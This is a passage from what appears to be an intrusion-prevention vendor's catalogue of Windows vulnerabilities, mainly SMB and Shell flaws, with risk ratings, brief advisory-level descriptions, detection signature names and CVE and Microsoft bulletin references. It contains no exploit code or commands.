Microsoft-Windows-Search-Protocol-Handler-Command-Execution

About this vulnerability:

A vulnerability in the search protocol handler in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-191-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows Vista; Windows 2008

Software:

<os>

Type:

Input Validation

Description:

There is a command execution vulnerability in Microsoft Windows. There is a design error in the way Windows Explorer handles search queries provided by the search-ms protocol handler. Remote attackers could exploit this vulnerability by persuading a target user to visit a specially crafted web page. Successful exploitation allows arbitrary command execution in the security context of the currently logged on user.

Situation:

HTTP_SS-Microsoft-Windows-Search-Protocol-Handler-Command-Execution
File-Text_Microsoft-Windows-Search-Protocol-Handler-Command-Execution

References:

CVE-2008-4269
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4269

BID-32652
http://www.securityfocus.com/bid/32652

MS08-075
http://technet.microsoft.com/security/bulletin/MS08-075

Microsoft-Windows-Search-Type-Confusion

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-975-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A vulnerability in Microsoft Windows

Situation:

SMB-TCP_CS-Microsoft-Windows-Search-Type-Confusion

References:

CVE-2017-8620
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8620

Microsoft-Windows-Security-Feature-Bypass-CVE-2024-38217

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1775-5242

Last changed:

sgpkg-ips-1775-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A bypass for the Mark of the Web security feature has been reported in Microsoft Windows.

Situation:

File-Binary_Microsoft-Windows-Security-Feature-Bypass-CVE-2024-38217

References:

CVE-2024-38217
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38217

ms24-sep
http://technet.microsoft.com/security/bulletin/ms24-sep

Microsoft-Windows-Server-Driver-Crafted-SMB-Packet-DoS

About this vulnerability:

Denial of service vulnerability in the handling of crafted SMB packets in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-77-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000 SP4; Windows XP SP1; Windows XP SP2; Windows 2003 SP0; Windows 2003 SP1

Software:

<os>

Type:

Malfunction

Description:

There is a denial of service vulnerability in the handling of crafted SMB packets in Microsoft Windows due to NULL pointer dereference error in the server driver.

Situation:

SMB-TCP_Microsoft-Windows-Server-Crafted-SMB-Packet
SMB-TCP_Microsoft-Windows-Server-Crafted-SMB-Packet-DOS
SMB-TCP_Microsoft-SRV.SYS-Pipe-Transaction-No-Null-DoS

References:

CVE-2006-3942
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3942

BID-19215
http://www.securityfocus.com/bid/19215

OSVDB-27644
http://www.osvdb.org/27644

MS06-063
http://technet.microsoft.com/security/bulletin/MS06-063

Microsoft-Windows-Server-Service-Authorization-Weakness

About this vulnerability:

A vulnerability in the Server Service of Microsoft Windows.

Risk:

High

First detected in:

sgpkg-ips-1527-5242

Last changed:

sgpkg-ips-1527-5242

Platform:

Windows

Software:

Windows Server

Type:

Insecure Configuration

Description:

A vulnerability in the Server Service of Microsoft Windows, multiple versions, due to an off-by-one access check for an RPC function intended to be restricted to local only calls, which if successfully exploited could result in SMB over QUIC certificate tampering or use as part of NTLM relay attacks.

Situation:

SMB-TCP_Microsoft-Windows-Server-Service-Authorization-Weakness

References:

CVE-2022-30216
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30216

Microsoft-Windows-Server-Service-SMB-Rename-Code-Execution

About this vulnerability:

Detects remote code execution exploits against Microsoft Windows via a crafted SMB Rename request

Risk:

Moderate

First detected in:

sgpkg-ips-82-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000 SP4; Windows XP SP1; Windows XP SP2; Windows 2003; Windows 2003 SP1

Software:

<os>

Type:

Malfunction

Description:

There is a remote code execution vulnerability in the handling of crafted SMB Rename requests in Microsoft Windows. By successfully exploiting this vulnerability, an authenticated remote attacker can cause a DoS or execute arbitrary code with SYSTEM privileges.

Situation:

SMB-TCP_CHS-Microsoft-Windows-Server-Service-SMB-Rename-Code-Execution

References:

CVE-2006-4696
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4696

BID-20373
http://www.securityfocus.com/bid/20373

MS06-063
http://technet.microsoft.com/security/bulletin/MS06-063

Microsoft-Windows-Sharepoint-Services-Cross-Site-Scripting

About this vulnerability:

A cross-site scripting vulnerability in Microsoft Office SharePoint Server

Risk:

Low

First detected in:

sgpkg-ips-125-2032

Last changed:

sgpkg-ips-1637-5242

Platform:

Windows

Software:

Microsoft Office SharePoint Server

Type:

Cross-site Scripting

Description:

There is a cross-site scripting vulnerability in Microsoft Office SharePoint Server. The flaw is due to a lack of input validation when processing the URL request from the client. The flaw may be exploited by malicious users to execute arbitrary HTML code on target user's web browser in the context of a trusted web site.

References:

CVE-2007-2581
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2581

BID-23832
http://www.securityfocus.com/bid/23832

OSVDB-37630
http://www.osvdb.org/37630

MS07-059
http://technet.microsoft.com/security/bulletin/MS07-059

Microsoft-Windows-Shell-File-Name-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-463-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Windows Shell. The vulnerability is due to the way the Windows shell handles file and directory names. An attacker can exploit this vulnerability by enticing a user to open a file or directory with a specially crafted name. Successful exploitation could lead to arbitrary code execution in the security context of the target user.

Situation:

SMB-TCP_Microsoft-Windows-Shell-File-Name-Code-Execution
File-TextId_Microsoft-Windows-Shell-File-Name-Code-Execution

References:

CVE-2012-0175
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0175

BID-54307
http://www.securityfocus.com/bid/54307

OSVDB-83656
http://www.osvdb.org/83656

MS12-048
http://technet.microsoft.com/security/bulletin/MS12-048

Microsoft-Windows-Shell-Graphics-Thumbnail-Image-Integer-Overflow

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-432-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A heap buffer overflow vulnerability exists in Microsoft Windows Shell Graphics Processing. The vulnerability is due to an integer overflow error when processing a width value of a thumbnail image. An attacker can exploit this vulnerability by enticing a user to handle a specially crafted file. The file could be embedded in Office documents or a .MIC file. This vulnerability may be triggered by previewing the malicious file in thumbnail view. Successful exploitation could lead to arbitrary code execution. Note that CVE-2010-3970 covers two different vulnerabilities. This report covers the integer overflow announced by iDefense whereas FSC20110104-03 covers the stack buffer overflow.

Situation:

File-OLE_Windows-Shell-Graphics-Thumbnail-Image-Integer-Overflow

References:

CVE-2010-3970
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3970

BID-45662
http://www.securityfocus.com/bid/45662

MS11-006
http://technet.microsoft.com/security/bulletin/MS11-006

Microsoft-Windows-Shell-Vulnerability

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-414-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There exists a vulnerability in the Microsoft Windows Shell pertaining to the method of launching applications. By using a specially crafted file name, an attacker can mask the file-type of a file. The attacker can then entice a user to open a file which appears to be innocuous, but which results in the remote execution of code. When the victim opens a malicious link either by clicking on it directly or through HTTP redirection, he/she is prompted with a "File Download" dialogue for action to be taken on the remote content. The file name of the remote content would be displayed with an apparently harmless file name extension. For example, the malicious file name could masquerade as a video clip (e.g, xxx.mpeg). If the user selects "Open", an application that is associated with the CLSID, used as the file extension, is then run and passed the remote content. If the file name contains a CLSID that allows for code execution, and the remote content contains executable code then code is executed in the Local Security Zone. If the file name contains URL encoding, some applications will launch but will not load the file; otherwise, the script is executedn. Further target behaviour is dependent on the content of the malicious code. If the user selected "Save", a "Save As" dialogue is displayed for the location and name the remote content should be saved as. The suggested file name contains the CLSID string that is defined by the attacker.

Situation:

HTTP_SHS-Microsoft-Windows-Shell-Vulnerability

References:

CVE-2004-0420
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0420

BID-9510
http://www.securityfocus.com/bid/9510

MS04-024
http://technet.microsoft.com/security/bulletin/MS04-024

Microsoft-Windows-Shell-Zip-File-Remote-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1059-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

There has been reported a vulnerability in the Windows Shell component of Microsoft Windows. Successful exploitation could lead to arbitrary code execution in the target system.

Situation:

File-Zip_Microsoft-Windows-Shell-Zip-File-Remote-Code-Execution

References:

CVE-2018-0883
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0883

Microsoft-Windows-ShellExecute-And-IE7-Url-Handling-Code-Execution

About this vulnerability:

A vulnerability in URL protocol handlers of Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-125-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP; Windows 2003

Software:

Adobe Acrobat; Adobe Reader; mIRC; Mozilla Firefox; Netscape; Microsoft Outlook Express; Microsoft Outlook

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Windows that could be exploited by remote attackers to compromise a vulnerable system. The issue exists in the interaction between ShellExecute and IE7 URLMon component when handling malformed URLs. Successful exploitation would allow the attacker to execute arbitrary command on the vulnerable client system within the context of the logged in user.

Situation:

HTTP_Mozilla-Firefox-Multiple-URI-Handlers-Command-Execution
File-PDF_Windows-ShellExecute-And-IE7-Url-Handling-Code-Execution
File-Text_Mozilla-Firefox-Multiple-URI-Handlers-Command-Execution
File-TextId_Mozilla-Firefox-Multiple-URI-Handlers-Command-Execution

References:

CVE-2007-3896
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3896

BID-25945
http://www.securityfocus.com/bid/25945

MS07-061
http://technet.microsoft.com/security/bulletin/MS07-061

Microsoft-Windows-SmartScreen-Security-Feature-Bypass-CVE-2022-44698

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1578-5242

Last changed:

sgpkg-ips-1578-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

A security feature bypass vulnerability has been reported in Microsoft Windows SmartScreen. This vulnerability is due to improper handling of Authenticode signatures. A remote attacker could exploit this vulnerability by enticing a target user to open a crafted executable or visit a malicious link. Successful exploitation could result in the bypass of SmartScreen security warnings.

Situation:

File-Text_Microsoft-Windows-SmartScreen-Security-Feature-Bypass-CVE-2022-44698
File-Exe_Microsoft-Windows-SmartScreen-Security-Feature-Bypass-CVE-2022-44698

References:

CVE-2022-44698
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-44698

ms22-dec
http://technet.microsoft.com/security/bulletin/ms22-dec

Microsoft-Windows-SMB-Authentication-Reflection-Remote-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-184-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000; Windows XP; Windows Vista; Windows 2003; Windows 2008

Software:

<os>

Type:

Insecure Configuration

Description:

There is an authentication reflection vulnerability in Microsoft Windows SMB services. The flaw is due to a weak authentication challenge/response mechanism. Remote unauthenticated attackers can exploit this vulnerability by enticing users to connect to a crafted SMB server, and then connect back to the user's own SMB service using the user's own challenge/response values. A successful exploitation can lead to arbitrary code execution in the security context of the affected user.

Situation:

SMB-TCP_Microsoft-Windows-SMB-Authentication-Reflection-Remote-Code-Execution
SMB-TCP_CHS-Authentication-Attempt

References:

CVE-2008-4037
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4037

BID-7385
http://www.securityfocus.com/bid/7385

OSVDB-49736
http://www.osvdb.org/49736

MS08-068
http://technet.microsoft.com/security/bulletin/MS08-068

Microsoft-Windows-Smb-Client-Message-Size-Vulnerability

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-415-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

A remote code execution vulnerability exists in Microsoft Windows SMB Client. The vulnerability is due to improper validation of certain SMB fields when parsing transaction responses. Remote unauthenticated attackers could exploit this vulnerability by enticing a user to connect to a malicious SMB server and sending a specially crafted SMB response to the target machine. Successful exploitation would allow for arbitrary code injection and execution with the privileges of the operating system kernel (Ring 0). Code injection that does not result in execution could crash the target system, and result in a Denial of Service condition.

Situation:

NetBIOS-TCP_Microsoft-Windows-Smb-Client-Message-Size-Vulnerability

References:

CVE-2010-0477
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0477

MS10-020
http://technet.microsoft.com/security/bulletin/MS10-020

Microsoft-Windows-SMB-Client-Pool-Corruption

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-281-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000; Windows XP; Windows 2003

Software:

<os>

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Windows.

Situation:

SMB-TCP_Microsoft-Windows-SMB-Client-Pool-Corruption

References:

CVE-2010-0016
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0016

MS10-006
http://technet.microsoft.com/security/bulletin/MS10-006

Microsoft-Windows-SMB-Client-Race-Condition

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-287-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows Vista; Windows 2008; Windows 7

Software:

<os>

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Windows.

Situation:

SMB-TCP_Microsoft-Windows-SMB-Client-Race-Condition

References:

CVE-2010-0017
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0017

MS10-006
http://technet.microsoft.com/security/bulletin/MS10-006

Microsoft-Windows-Smb-Client-Response-Parsing-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-415-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

Situation:

SMB-TCP_Microsoft-Windows-Smb-Client-Response-Parsing-Memory-Corruption

References:

CVE-2010-0476
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0476

BID-39336
http://www.securityfocus.com/bid/39336

MS10-020
http://technet.microsoft.com/security/bulletin/MS10-020

Microsoft-Windows-SMB-Client-Transaction-BOF-CVE-2010-0270

About this vulnerability:

A buffer overflow vulnerability in Microsoft Windows SMB Client

Risk:

Critical

First detected in:

sgpkg-ips-302-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2008; Windows 7

Software:

<os>

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Microsoft Windows SMB Client. A remote unauthenticated attacker can exploit this vulnerability by enticing a user to connect to a malicious SMB server, and sending a specially crafted SMB response to the target machine.

Situation:

SMB-TCP_Microsoft-Windows-SMB-Client-Transaction-BOF-Exploit-CVE-2010-0270

References:

CVE-2010-0270
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0270

BID-39339
http://www.securityfocus.com/bid/39339

OSVDB-62046
http://www.osvdb.org/62046

MS10-020
http://technet.microsoft.com/security/bulletin/MS10-020

Microsoft-Windows-SMB-Information-Disclosure-Vulnerability-CVE-2021-28324

About this vulnerability:

A vulnerability in microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1339-5242

Last changed:

sgpkg-ips-1339-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There exists an uninitialized memory vulnerability in Microsoft Windows. Successful exploitation could lead in information disclosure.

Situation:

SMB-TCP_SHS-Microsoft-Windows-SMB-Information-Disclosure-Vulnerability-CVE-2021-28324

References:

CVE-2021-28324
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28324

ms21-apr
http://technet.microsoft.com/security/bulletin/ms21-apr

Microsoft-Windows-SMB-Information-Disclosure-Vulnerability-CVE-2021-28325

About this vulnerability:

A vulnerability in microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1339-5242

Last changed:

sgpkg-ips-1339-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There exists an uninitialized memory vulnerability in Microsoft Windows. Successful exploitation could lead in information disclosure.

Situation:

SMB-TCP_SHS-Microsoft-Windows-SMB-Information-Disclosure-Vulnerability-CVE-2021-28325

References:

CVE-2021-28325
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28325

ms21-apr
http://technet.microsoft.com/security/bulletin/ms21-apr

Microsoft-Windows-SMB-Negoex-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1549-5242

Last changed:

sgpkg-ips-1549-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

The SPNEGO Extended Negotiation (NEGOEX) Security Mechanism, which allows a client and server to negotiate the choice of security mechanism to use has a vulnerability that may allow a remote attacker to execute arbitrary code on the target system or gian access to information thereon.

Situation:

SMB-TCP_CHS-Microsoft-Windows-Negoex-Buffer-Overflow

References:

CVE-2022-37958
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37958

Microsoft-Windows-SMB-Negotiate-Request-Remote-Code-Execution

About this vulnerability:

A Remote exploitable vulnerability in SMB protocol

Risk:

Critical

First detected in:

sgpkg-ips-243-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

A vulnerability has been reported in Microsoft Server Message Block (SMB) Protocol that could allow remote attackers to execute arbitrary code on the vulnerable system due to memory corruption. The vulnerability is due to incorrectly indexing an array when handling specially crafted SMB packets. Remote attackers could exploit this vulnerability by sending a specially crafted network message to a computer running the Server service. Successful exploitation would allow for arbitrary code injection and execution with the privileges of System. Code injection that does not result in execution could crash the target system, and result in a Denial of Service condition. Products Directly Affected by the Vulnerability are Microsoft Windows 7, Microsoft Windows Vista and Microsoft Windows Server 2008.

Situation:

SMB-TCP_Negotiate-Protocol-Smb2-Remote-Code-Execution

References:

CVE-2009-3103
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103

BID-36299
http://www.securityfocus.com/bid/36299

OSVDB-57799
http://www.osvdb.org/57799

MS09-050
http://technet.microsoft.com/security/bulletin/MS09-050

Microsoft-Windows-SMB-Search-Request-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-377-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in Microsoft Windows SMB services.

Situation:

SMB-TCP_Microsoft-Windows-SMB-Search-Request-Buffer-Overflow

References:

CVE-2008-4038
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4038

BID-31647
http://www.securityfocus.com/bid/31647

MS08-063
http://technet.microsoft.com/security/bulletin/MS08-063

Microsoft-Windows-SMB-Server-Denial-Of-Service-CVE-2010-0022

About this vulnerability:

A denial of service vulnerability in Microsoft Windows SMB server

Risk:

High

First detected in:

sgpkg-ips-283-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There is a denial of service vulnerability in Microsoft Windows SMB server.

Situation:

SMB-TCP_Microsoft-Windows-SMB-Server-Denial-Of-Service-CVE-2010-0022

References:

CVE-2010-0022
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0022

MS10-012
http://technet.microsoft.com/security/bulletin/MS10-012

Microsoft-Windows-SMB-Server-Ntlm-Authentication-Lack-Of-Entropy

About this vulnerability:

An NTLM authentication bypass vulnerability in Microsoft Windows SMB server

Risk:

High

First detected in:

sgpkg-ips-284-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There is an NTLM authentication bypass vulnerability in Microsoft Windows SMB server. A remote unauthenticated attacker can exploit this vulnerability to access the SMB service under the credentials of an authorized user. Depending on the privileges of the user and the system configuration, an attacker may obtain read/write access to the files system and execute arbitrary code by deploying DCE/RPC over SMB.

References:

CVE-2010-0231
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0231

MS10-012
http://technet.microsoft.com/security/bulletin/MS10-012

Microsoft-Windows-SMB-Server-Remote-Code-Execution-CVE-2010-0020

About this vulnerability:

A buffer overflow vulnerability in Microsoft Windows SMB server

Risk:

High

First detected in:

sgpkg-ips-283-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Microsoft Windows SMB server. An authenticated remote attacker can send specially crafted SMB packets to compromise the vulnerable system.

Situation:

SMB-TCP_CHS-Microsoft-Windows-SMB-Server-Remote-Code-Execution-MS10-012

References:

CVE-2010-0020
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0020

BID-38049
http://www.securityfocus.com/bid/38049

MS10-012
http://technet.microsoft.com/security/bulletin/MS10-012

Microsoft-Windows-Smb-Server-Smbv1-CVE-2017-0143-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-931-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There exists a remote code execution vulnerability in the SMBv1 component of Microsoft Windows SMB server.

Situation:

SMB-TCP_CS-Microsoft-Windows-Smb-Server-Smbv1-CVE-2017-0143-Memory-Corruption
SMB-TCP_SS-Microsoft-Windows-Smb-Server-Smbv1-CVE-2017-0143-Memory-Corruption

References:

CVE-2017-0143
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

MS17-010
http://technet.microsoft.com/security/bulletin/MS17-010

Microsoft-Windows-Smb-Server-Smbv1-CVE-2017-0144-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Critical

First detected in:

sgpkg-ips-920-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There exists a remote code execution vulnerability in SMBv1. This vulnerability was utilized by the EternalBlue exploit which has been used as part of the WannaCry ransomware.

Situation:

SMB-TCP_Microsoft-Windows-Smb-Server-Smbv1-CVE-2017-0144-Memory-Corruption
SMB-TCP_CHS-Microsoft-Windows-Smb-Server-Smbv1-CVE-2017-0144-Memory-Corruption
Generic_CS-DoublePulsar-Shellcode

References:

CVE-2017-0144
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144

MS17-010
http://technet.microsoft.com/security/bulletin/MS17-010

Microsoft-Windows-SMB-Server-Smbv1-CVE-2017-0145-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-869-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

Improper handling of SMBv1 requests causes a buffer overflow vulnerability in Windows. A successful exploitation allows an attacker to run arbitrary code with system privileges.

Situation:

SMB-TCP_Microsoft-Windows-SMB-Server-Smbv1-CVE-2017-0145-Buffer-Overflow

References:

CVE-2017-0145
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145

MS17-010
http://technet.microsoft.com/security/bulletin/MS17-010

Microsoft-Windows-Smb-Server-Smbv1-CVE-2017-0146-RCE

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-931-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There exists a remote code execution vulnerability in the SMBv1 component of Microsoft Windows SMB server.

Situation:

SMB-TCP_CS-Microsoft-Windows-Smb-Server-Smbv1-CVE-2017-0146-RCE

References:

CVE-2017-0146
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146

MS17-010
http://technet.microsoft.com/security/bulletin/MS17-010

Microsoft-Windows-SMB-Server-Smbv1-Information-Disclosure

About this vulnerability:

A Microsoft Windows SMB Server Smbv1 Information Disclosure vulnerability

Risk:

High

First detected in:

sgpkg-ips-937-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

An information disclosure vulnerability in Microsoft Windows SMB Server, in multiple Windows versions, which allows remote attackers to gain sensitive information by sending a crafted SMBv1 request.

Situation:

SMB-TCP_CS-Microsoft-Windows-SMB-Server-Smbv1-Information-Disclosure

References:

CVE-2017-0271
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0271

Microsoft-Windows-SMB-Server-Smbv1-Information-Disclosure-2

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1009-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

Exploiting a vulnerability in the SMB server component of Microsoft Windows may lead to disclosure of information due to improper handling of SMBv1 requests.

Situation:

SMB-TCP_CS-Microsoft-Windows-Smb-Server-Smbv1-Information-Disclosure-2

References:

CVE-2017-11815
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11815

Microsoft-Windows-SMB-Server-Smbv1-Out-Of-Bounds-Read

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-927-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

Improper processing of SMBv1 protocol messages causes an out-of-bounds read vulnerability in Windows. A successful exploit allows an attacker to gain access to sensitive information which may help further attacks.

Situation:

SMB-TCP_CHS-Microsoft-Windows-SMB-Server-Smbv1-Out-Of-Bounds-Read

References:

CVE-2017-0267
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0267

Microsoft-Windows-Smb-Server-Smbv1-Out-Of-Bounds-Read-CVE-2017-11781

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1005-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A remote attacker could exploit an out ouf bounds vulnerability, which is due to improper handling of SMBv1 requests.

Situation:

SMB-TCP_CS-Microsoft-Windows-Smb-Server-Smbv1-Out-Of-Bounds-Read

References:

CVE-2017-11781
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11781

Microsoft-Windows-SMB-Service-Buffer-Overflow-MS08-063

About this vulnerability:

A buffer overflow vulnerability in Microsoft Windows SMB service

Risk:

High

First detected in:

sgpkg-ips-179-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

A buffer overlfow vulnerability exists in Microsoft Windows SMB services. The flaw is due insufficient input validation when handling file names. Remote authenticated attackers can exploit this vulnerability by sending specially crafted messages to the affected interface. A successful exploitation can lead to arbitrary code excution with System level privileges.

Situation:

SMB-TCP_SMB-Search-Buffer-Overflow-MS08-063

References:

CVE-2008-4038
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4038

BID-31647
http://www.securityfocus.com/bid/31647

MS08-063
http://technet.microsoft.com/security/bulletin/MS08-063

Microsoft-Windows-SMB-Transaction-CVE-2011-0661

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-386-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP; Windows Vista; Windows 2003; Windows 2008; Windows 7; Windows 2008 R2

Software:

<os>

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Windows.

Situation:

NetBIOS-TCP_SMB2-Microsoft-Windows-SMB-Transaction-CVE-2011-0661

References:

CVE-2011-0661
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0661

BID-47198
http://www.securityfocus.com/bid/47198

OSVDB-71781
http://www.osvdb.org/71781

MS11-020
http://technet.microsoft.com/security/bulletin/MS11-020

Microsoft-Windows-SMB2-DFS-DOS

About this vulnerability:

A Denial of Service vulnerability in SMB2 protocol

Risk:

Moderate

First detected in:

sgpkg-ips-258-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

There is a remote unauthenticated vulnerability in SMBv2 that can lead to a CPU exhaustion on the host and force a reboot.

Situation:

NetBIOS-TCP_SMB2-DFS-DOS-MS09-050

References:

CVE-2009-2526
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2526

MS09-050
http://technet.microsoft.com/security/bulletin/MS09-050

Microsoft-Windows-SMB2-Response-Parsing-Vulnerability-CVE-2011-1268

About this vulnerability:

An attempt to exploit a Windows SMB2 parsing vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-396-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

Vulnerability in Microsoft Excel

Situation:

NetBIOS-TCP_Microsoft-Windows-SMB2-Response-Parsing-Vulnerability-CVE-2011-1268

References:

CVE-2011-1268
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1268

MS11-043
http://technet.microsoft.com/security/bulletin/MS11-043

Microsoft-Windows-SMB2-Write-DOS-CVE-2011-1267

About this vulnerability:

